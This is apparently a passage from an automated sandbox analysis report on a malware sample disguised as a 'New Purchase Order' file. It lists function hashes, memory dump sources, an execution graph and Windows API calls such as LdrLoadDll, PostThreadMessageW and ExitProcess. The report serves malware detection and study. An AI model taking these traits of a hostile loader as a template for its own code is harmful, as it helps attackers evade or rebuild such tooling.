                                                          • Opcode Fuzzy Hash: 9e9310d25383b6399f39d686cad29e2a10957a230258bcf0f622164e76af2d47
                                                          • Instruction Fuzzy Hash: AF21F172604200DFDB05DF94D9C4B26BBA5FF88321F24C5A9E9090A246C336D817CBA2
                                                          Function 0197D3D8 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298235595.000000000197D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0197D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_197d000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0701ed1f35d93aec862b902bc8503cc138622622b4a2640865a2e8dd1bee393b
                                                          • Instruction ID: da72571b096ab491b768c2b865a26a419ff6457773415b3e6afb3728e1526dae
                                                          • Opcode Fuzzy Hash: 0701ed1f35d93aec862b902bc8503cc138622622b4a2640865a2e8dd1bee393b
                                                          • Instruction Fuzzy Hash: CE213372604200DFDB05DF44D9C0F66BFA9FF88725F20C569E80D0B286C336E446CAA2
                                                          Function 0198D01C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298279710.000000000198D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0198D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_198d000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b74d9f4d6ac4a2a813111c9f1aa90278c77f82b4861ce7dc6765a246ba59a5c5
                                                          • Instruction ID: e6aa34a74eb2c4faa9e90b3df5522b8f5b2fea49c9ab90df76d5fd7ece3b7eea
                                                          • Opcode Fuzzy Hash: b74d9f4d6ac4a2a813111c9f1aa90278c77f82b4861ce7dc6765a246ba59a5c5
                                                          • Instruction Fuzzy Hash: 9521D075604304DFDB15EF94D984B26BBA5EB84325F20C96DD84E4B286C33AD847CA62
                                                          Function 0198D006 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298279710.000000000198D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0198D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_198d000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6be4c4d032a336f5cc9bacd0a2aa2370e5181ac5a5b2e68b830bd4007a98c1b4
                                                          • Instruction ID: 3caa57c9b3beddb71c7f052ec477f0b60796f7cf1e80541a31c128b6da70876b
                                                          • Opcode Fuzzy Hash: 6be4c4d032a336f5cc9bacd0a2aa2370e5181ac5a5b2e68b830bd4007a98c1b4
                                                          • Instruction Fuzzy Hash: 24219F755093808FDB03DF64D990715BFB1EB46214F28C5EAD8498F6A7C33A980BCB62
                                                          Function 0197D1F7 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298235595.000000000197D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0197D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_197d000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
                                                          • Instruction ID: c2a562cbf5c1f0a7bcd1ee73cbe9aec05aa706829ad59f1553a6bb32624bf360
                                                          • Opcode Fuzzy Hash: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
                                                          • Instruction Fuzzy Hash: 48219D76504240DFDB06CF54D9C4B56BFA2FF84324F24C5A9DD490A656C33AD426CBA1
                                                          Function 0197D3D3 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298235595.000000000197D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0197D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_197d000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                          • Instruction ID: 23fe7b231e76772bf79caee38288e4b06c48da89fdd01a4931ada8f94dbbb8c8
                                                          • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                          • Instruction Fuzzy Hash: FD11CD76504240DFDB06CF44D5C0B56BFA2FF84324F2482A9D8090A296C33AE456CBA1
                                                          Function 0197D731 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298235595.000000000197D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0197D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_197d000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1017227c9e33e80b34e7557986da8f7a7861087d5b0899efc2cdb506c299f89b
                                                          • Instruction ID: 79f4de452c56d3c852a881570b5960e23b1377b200a79b70f6ea1251ddde3fb4
                                                          • Opcode Fuzzy Hash: 1017227c9e33e80b34e7557986da8f7a7861087d5b0899efc2cdb506c299f89b
                                                          • Instruction Fuzzy Hash: FF01F7B14043849AF7204A65CCC4B66FFDCDF80226F14C81AED4D4F183C2389840CAB6
                                                          Function 0197D730 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298235595.000000000197D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0197D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_197d000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8462059a07e665150994a0a52b930dc861f99f7f39894202963eee8fd102acaa
                                                          • Instruction ID: a1e22a4bc6275dc6df974ea026b5c47ef13cdd9e4481eee6b42744051f45c897
                                                          • Opcode Fuzzy Hash: 8462059a07e665150994a0a52b930dc861f99f7f39894202963eee8fd102acaa
                                                          • Instruction Fuzzy Hash: DEF06D72404384AEE7208A1ADD84B66FFDCEF85735F18C55AED4C4B283C279A844CAB1

                                                          Non-executed Functions

                                                          Function 031213F8 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: qJ
                                                          • API String ID: 0-1955030436
                                                          • Opcode ID: cd7431d6aafdeb2afcfffb7a7f855951dc63a4fdcf386bc9d89aa36cafe20449
                                                          • Instruction ID: 1bc51e444e930669dbea21450eb4e26ec4cbe61759fc11f42072f0c9de7daa37
                                                          • Opcode Fuzzy Hash: cd7431d6aafdeb2afcfffb7a7f855951dc63a4fdcf386bc9d89aa36cafe20449
                                                          • Instruction Fuzzy Hash: 5931F371B042659FC708CA69D85046EBFF6FFD9200B2281BBE51ADB362D7348E51CB81
                                                          Function 08148900 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c42350e9d8eb2ef8bd7caca20e3c3f41787efa7f357fce91f31b88bb6cde031
                                                          • Instruction ID: 16b6ade5b38ea2a8e1bef920d14f8ba17d38659614cb8b43fe554464d2a43072
                                                          • Opcode Fuzzy Hash: 6c42350e9d8eb2ef8bd7caca20e3c3f41787efa7f357fce91f31b88bb6cde031
                                                          • Instruction Fuzzy Hash: 0BE1F674E002198FDB14DFA9C580AAEFBB2FF89305F249169D815AB355D731AD42CFA0
                                                          Function 0814A978 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3133381e3a11c9363323546e5d763bfef59183067b33744c4a797cd3d3f85b5f
                                                          • Instruction ID: d9904c05fc604cb04ed371cd2bbc0ba1a823f7e5bed96380ac785736df9e92a0
                                                          • Opcode Fuzzy Hash: 3133381e3a11c9363323546e5d763bfef59183067b33744c4a797cd3d3f85b5f
                                                          • Instruction Fuzzy Hash: 1AE10774E002298FDB14DFA8C590AAEFBB2FF89305F248169D415AB355D735AD42CFA0
                                                          Function 08148D38 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae08bd187dbce6909a9152bb5ecb814b97437a8195d7d62af6204d59cd7194b6
                                                          • Instruction ID: c78216c18c5db021bcfd5801bdf1b949eb42cf71eeeb0a07f93a8cce1e4e89f0
                                                          • Opcode Fuzzy Hash: ae08bd187dbce6909a9152bb5ecb814b97437a8195d7d62af6204d59cd7194b6
                                                          • Instruction Fuzzy Hash: 24E10874E002198FDB14DFA9C580AAEFBB2FF89305F248169D419AB356D731AD42CF60
                                                          Function 08149170 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6dae4454ba40954d6db2f769154957e142d02044c4c85d672bcb7321b04ca692
                                                          • Instruction ID: 1b16d92c6c3380080654febe83e2860641e7d696b18a31412843f4f144f4d430
                                                          • Opcode Fuzzy Hash: 6dae4454ba40954d6db2f769154957e142d02044c4c85d672bcb7321b04ca692
                                                          • Instruction Fuzzy Hash: FAE10674E002198FDB14DFA9C580AAEFBB2FF89305F24816AD415AB355D731AD42CFA0
                                                          Function 081484C7 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 190a33ce6f9d204d4c360e9efe20581889d7cf27a4278e934ed027edfc0aac32
                                                          • Instruction ID: a8898ebdd069c14a6d7c9afa7aae245311480a703fd8eeb7d428469df63da171
                                                          • Opcode Fuzzy Hash: 190a33ce6f9d204d4c360e9efe20581889d7cf27a4278e934ed027edfc0aac32
                                                          • Instruction Fuzzy Hash: 7AE10774E002198FDB14DFA9C590AAEFBB2FF89305F248169D419AB355D731AD42CFA0
                                                          Function 08148D28 Relevance: .1, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb24197364432f553fe2ea333e8435f54d134deb8b4fec6231cbeb7347f80cc5
                                                          • Instruction ID: 98cd195c523f6fb6b19333151b1716cd109ed8d3df4543dc3ae2a4ce89080227
                                                          • Opcode Fuzzy Hash: eb24197364432f553fe2ea333e8435f54d134deb8b4fec6231cbeb7347f80cc5
                                                          • Instruction Fuzzy Hash: 1F510774E002198FDB14CFA9C580AAEBBF2FF89305F24816AD419A7356D7359D42CFA0
                                                          Function 03122BBA Relevance: .1, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 160764fc2f974b8d6eb0fff1b47aa5f9c05ab0f6fcc59bea09158f5f6fc1aa98
                                                          • Instruction ID: 575dcccca1342c3dcb191f72e64b8b3feb5bb785eaac8a4e7220c11667f04deb
                                                          • Opcode Fuzzy Hash: 160764fc2f974b8d6eb0fff1b47aa5f9c05ab0f6fcc59bea09158f5f6fc1aa98
                                                          • Instruction Fuzzy Hash: C741D631618615CFC798CB79C98155EBBE6FB88210B558C6AE05ADB661D330D9A2CF01
                                                          Function 03122BC8 Relevance: .1, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8aaeb47f6c9bdd067ee3641d5e6d7847f361001c60e9edca6c7c1cd69139287d
                                                          • Instruction ID: 1607ab4408135e840f73548e05de44966d888aeb14d3110513fe7c87fc836a44
                                                          • Opcode Fuzzy Hash: 8aaeb47f6c9bdd067ee3641d5e6d7847f361001c60e9edca6c7c1cd69139287d
                                                          • Instruction Fuzzy Hash: A841DA31618615CFC798CB69C94165EBBE6FB88210B55CC2AE05ADB660D334E9A2CF41
                                                          Function 03123798 Relevance: .1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6f4cb417607c210adf2ab9f79636a432fc1b5c8f6a077454028b2c60fc26e55
                                                          • Instruction ID: 1b8be3489c31dd028897fd7c11ede4248269a95f515759d11ac602834ccdac2c
                                                          • Opcode Fuzzy Hash: b6f4cb417607c210adf2ab9f79636a432fc1b5c8f6a077454028b2c60fc26e55
                                                          • Instruction Fuzzy Hash: 1541D1B9F1461A8FCB44CFA9C9814AEFBB6FB8C600B168927D415EB350C338C9518F91
                                                          Function 031237A8 Relevance: .1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 708e7625e91027c1df8138ae64dabd4e7aee6ce75078d2cc82dc72ee0fa9c11e
                                                          • Instruction ID: e8429a023b4daa0ba5b35f7b8d0c7e34e810e04271f4a589e704f37ef0abce6a
                                                          • Opcode Fuzzy Hash: 708e7625e91027c1df8138ae64dabd4e7aee6ce75078d2cc82dc72ee0fa9c11e
                                                          • Instruction Fuzzy Hash: BE41A2B9F1462A8FCB44CF99C9855AEFBB6FB8C600B118926D415EB350C338D9518F91

                                                          Execution Graph

                                                          Execution Coverage:1.2%
                                                          Dynamic/Decrypted Code Coverage:5.1%
                                                          Signature Coverage:8%
                                                          Total number of Nodes:138
                                                          Total number of Limit Nodes:8
                                                          execution_graph 94795 424ce3 94796 424cfc 94795->94796 94797 424d47 94796->94797 94800 424d87 94796->94800 94802 424d8c 94796->94802 94803 42e743 94797->94803 94801 42e743 RtlFreeHeap 94800->94801 94801->94802 94806 42c9e3 94803->94806 94805 424d57 94807 42c9fd 94806->94807 94808 42ca0e RtlFreeHeap 94807->94808 94808->94805 94809 42f7e3 94810 42f7f3 94809->94810 94811 42f7f9 94809->94811 94814 42e823 94811->94814 94813 42f81f 94817 42c993 94814->94817 94816 42e83e 94816->94813 94818 42c9ad 94817->94818 94819 42c9be RtlAllocateHeap 94818->94819 94819->94816 94926 424953 94927 42496f 94926->94927 94928 424997 94927->94928 94929 4249ab 94927->94929 94931 42c663 NtClose 94928->94931 94930 42c663 NtClose 94929->94930 94933 4249b4 94930->94933 94932 4249a0 94931->94932 94936 42e863 RtlAllocateHeap 94933->94936 94935 4249bf 94936->94935 94937 42bc73 94938 42bc90 94937->94938 94941 1732df0 LdrInitializeThunk 94938->94941 94939 42bcb8 94941->94939 94820 41b223 94821 41b267 94820->94821 94823 41b288 94821->94823 94824 42c663 94821->94824 94825 42c67d 94824->94825 94826 42c68e NtClose 94825->94826 94826->94823 94827 413ca3 94829 413cc9 94827->94829 94828 413cf3 94829->94828 94831 413a23 94829->94831 94832 413a3f 94831->94832 94835 42c903 94832->94835 94836 42c91d 94835->94836 94839 1732c70 LdrInitializeThunk 94836->94839 94837 413a45 94837->94828 94839->94837 94942 41a4d3 94943 41a4e8 94942->94943 94945 41a542 94942->94945 94943->94945 94946 41e433 94943->94946 94947 41e459 94946->94947 94951 41e54d 94947->94951 94952 42f913 94947->94952 94949 41e4ee 94950 42bcc3 LdrInitializeThunk 94949->94950 94949->94951 94950->94951 94951->94945 94953 42f883 94952->94953 94954 42e823 RtlAllocateHeap 94953->94954 94955 42f8e0 94953->94955 94956 42f8bd 94954->94956 94955->94949 94957 42e743 RtlFreeHeap 94956->94957 94957->94955 94958 413f93 94959 413fad 94958->94959 94961 413fcb 94959->94961 94964 417723 94959->94964 94962 414010 94961->94962 94963 413fff PostThreadMessageW 94961->94963 94963->94962 94965 417747 94964->94965 94966 417783 LdrLoadDll 94965->94966 94967 41774e 94965->94967 94966->94967 94967->94961 94968 1732b60 LdrInitializeThunk 94840 401b04 94841 401b19 94840->94841 94844 42fcb3 94841->94844 94847 42e2f3 94844->94847 94848 42e319 94847->94848 94859 4072e3 94848->94859 94850 42e32f 94858 401c17 94850->94858 94862 41b033 94850->94862 94852 42e363 94873 428203 94852->94873 94853 42e34e 94853->94852 94877 42ca33 94853->94877 94856 42e37d 94857 42ca33 ExitProcess 94856->94857 94857->94858 94861 4072f0 94859->94861 94880 4163e3 94859->94880 94861->94850 94863 41b05f 94862->94863 94898 41af23 94863->94898 94866 41b08c 94868 42c663 NtClose 94866->94868 94869 41b097 94866->94869 94867 41b0a4 94870 42c663 NtClose 94867->94870 94871 41b0c0 94867->94871 94868->94869 94869->94853 94872 41b0b6 94870->94872 94871->94853 94872->94853 94874 428265 94873->94874 94876 428272 94874->94876 94909 418583 94874->94909 94876->94856 94878 42ca4d 94877->94878 94879 42ca5e ExitProcess 94878->94879 94879->94852 94881 416400 94880->94881 94883 416419 94881->94883 94884 42d0d3 94881->94884 94883->94861 94886 42d0ed 94884->94886 94885 42d11c 94885->94883 94886->94885 94891 42bcc3 94886->94891 94889 42e743 RtlFreeHeap 94890 42d195 94889->94890 94890->94883 94892 42bce0 94891->94892 94895 1732c0a 94892->94895 94893 42bd0c 94893->94889 94896 1732c11 94895->94896 94897 1732c1f LdrInitializeThunk 94895->94897 94896->94893 94897->94893 94899 41b019 94898->94899 94900 41af3d 94898->94900 94899->94866 94899->94867 94904 42bd63 94900->94904 94903 42c663 NtClose 94903->94899 94905 42bd80 94904->94905 94908 17335c0 LdrInitializeThunk 94905->94908 94906 41b00d 94906->94903 94908->94906 94911 4185ad 94909->94911 94910 418aab 94910->94876 94911->94910 94917 413c03 94911->94917 94913 4186da 94913->94910 94914 42e743 RtlFreeHeap 94913->94914 94915 4186f2 94914->94915 94915->94910 94916 42ca33 ExitProcess 94915->94916 94916->94910 94918 413c23 94917->94918 94920 413c8c 94918->94920 94922 41b343 RtlFreeHeap LdrInitializeThunk 94918->94922 94920->94913 94921 413c82 94921->94913 94922->94921 94923 418cc8 94924 42c663 NtClose 94923->94924 94925 418cd2 94924->94925

                                                          Executed Functions

                                                          Function 00417723 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 356 417723-41774c call 42f323 359 417752-417760 call 42f923 356->359 360 41774e-417751 356->360 363 417770-417781 call 42ddc3 359->363 364 417762-41776d call 42fbc3 359->364 369 417783-417797 LdrLoadDll 363->369 370 41779a-41779d 363->370 364->363 369->370
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417795
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                          • Instruction ID: c8367a89be375ba73a30cdb688ded44f01425706de2ca614d69ed47fcf1ac29a
                                                          • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                          • Instruction Fuzzy Hash: 49010CB5E00209BBDB10DBE5DC42FDEB7789B54308F4041AAA91897281FA35EB588B95
                                                          Function 0042C663 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 376 42c663-42c69c call 404783 call 42d8c3 NtClose
                                                          APIs
                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C697
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                          • Instruction ID: 55d98cbac179b72a764dd86cd5ec1f11a461976065f381c4f300eafe1b6f3ecb
                                                          • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                          • Instruction Fuzzy Hash: E8E086326402147BD210FB6ADC41FD7776CDFC5714F00451AFA1867242C6757A1587F5
                                                          Function 01732B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 390 1732b60-1732b6c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 30fe9fa3057a1ab11b05288b90a44049a4452e8bf74bc80c59f62953e37780e1
                                                          • Instruction ID: 66651c93887bdf486f614ccb12b9ac58611b3f542d913834f60ecb22a9c19bb3
                                                          • Opcode Fuzzy Hash: 30fe9fa3057a1ab11b05288b90a44049a4452e8bf74bc80c59f62953e37780e1
                                                          • Instruction Fuzzy Hash: 6190026130640403420571984414616800A97E0201B55C031E10145A0DC7658A916226
                                                          Function 01732DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8b38139f7dd0ca52afefdeaecfe02002cdaf108d71fbe367163d1a09f9621245
                                                          • Instruction ID: 241b5e28d1db50fe4ecacb613d39fc586e2fb66f865c04eca998702c93b0264b
                                                          • Opcode Fuzzy Hash: 8b38139f7dd0ca52afefdeaecfe02002cdaf108d71fbe367163d1a09f9621245
                                                          • Instruction Fuzzy Hash: 8090023130540813D21171984504707400997D0241F95C422A0424568DD7968B52A222
                                                          Function 01732C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 391 1732c70-1732c7c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e44cf641f2ce1e483c521d9dfe3b41cdb5a959be9d2ef43e1b4f3c3d19affb95
                                                          • Instruction ID: e9304fd3d3b27461b7f3afa31f81cdc7cbe6ec79fac2a3746a119138302a56a3
                                                          • Opcode Fuzzy Hash: e44cf641f2ce1e483c521d9dfe3b41cdb5a959be9d2ef43e1b4f3c3d19affb95
                                                          • Instruction Fuzzy Hash: 3690023130548C03D2107198840474A400597D0301F59C421A4424668DC7D58A917222
                                                          Function 017335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 472e36d67842cb028c69530f3f339f40b2a03c07f13d04d7d103383b9d16304f
                                                          • Instruction ID: e874e5bb6f6c741e8f70feb56f2cbe7cc4f5adbab63c6b67ddf6eb0037a2fc54
                                                          • Opcode Fuzzy Hash: 472e36d67842cb028c69530f3f339f40b2a03c07f13d04d7d103383b9d16304f
                                                          • Instruction Fuzzy Hash: 3990023170950803D20071984514706500597D0201F65C421A0424578DC7D58B5166A3
                                                          Function 00413F8F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: S$l420377x$l420377x
                                                          • API String ID: 1836367815-2727433438
                                                          • Opcode ID: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                          • Instruction ID: c2806ac613a218a9f43bc075071cdee210e11ad5ac0fb3b5002561ad8e7d22f2
                                                          • Opcode Fuzzy Hash: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                          • Instruction Fuzzy Hash: 43114C71D0015C7AEB10AAE69C81DEF7B7CDF4579CF448069FA0467141D27C8E064BB5
